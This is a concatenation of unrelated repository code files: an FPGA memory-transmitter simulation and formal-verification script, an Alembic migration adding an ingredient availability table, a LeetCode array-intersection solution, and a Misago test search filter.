    m.submodules.memtx = memtx = MemTX()
    sim = Simulator(m)
    def process():
        for i in range(20000):
            yield
    sim.add_clock(1e-8)
    sim.add_sync_process(process)
    with sim.write_vcd('memtx.vcd', 'memtx.gtkw', traces=memtx.ports()):
        sim.run()
    """
    Formal Verification
    """
    # Prove the fv_mode properties with an 18-cycle induction depth.
    class MemTXTest(FHDLTestCase):
        def test_memtx(self):
            self.assertFormal(MemTX(fv_mode=True), mode='prove', depth=18)
    MemTXTest().test_memtx()
    """
    Build
    """
    VersaECP5Platform().build(MemTXDemo(), do_program=True)
migrations/versions/f0ddbf9cdd26_add_ingredient_availability_table.py | brauls/ingredients-service | 0 | 12770848 | """add ingredient availability table
Revision ID: f0ddbf9cdd26
Revises: 7cf38c4ce08a
Create Date: 2019-06-28 21:34:49.780023
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f0ddbf9cdd26'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
    """Create INGREDIENT_AVAILABILITY: one integer availability score per
    (ingredient, month), keyed to INGREDIENT.id."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('INGREDIENT_AVAILABILITY',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('ingredient_id', sa.Integer(), nullable=False),
    sa.Column('month', sa.Integer(), nullable=False),
    sa.Column('availability', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['ingredient_id'], ['INGREDIENT.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('INGREDIENT_AVAILABILITY')
# ### end Alembic commands ###
| 1.359375 | 1 |
Leetcode/Sorting,_Binary_Search/1_-_Easy/349._Intersection_of_Two_Arrays.py | Khalid-Sultan/Algorithms-Prep | 1 | 12770849 | <reponame>Khalid-Sultan/Algorithms-Prep
class Solution:
    def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:
        """Return the distinct values present in both input lists.

        Set intersection does the membership test and the deduplication in
        one step, in O(len(nums1) + len(nums2)) time; the original built an
        intermediate list and deduplicated it afterwards. Result order is
        unspecified, as before.
        """
        return list(set(nums1) & set(nums2))
misago/misago/core/testproject/searchfilters.py | vascoalramos/misago-deployment | 2 | 12770850 | def test_filter(search):
return search.replace("MMM", "Marines, Marauders and Medics")
| 1.851563 | 2 |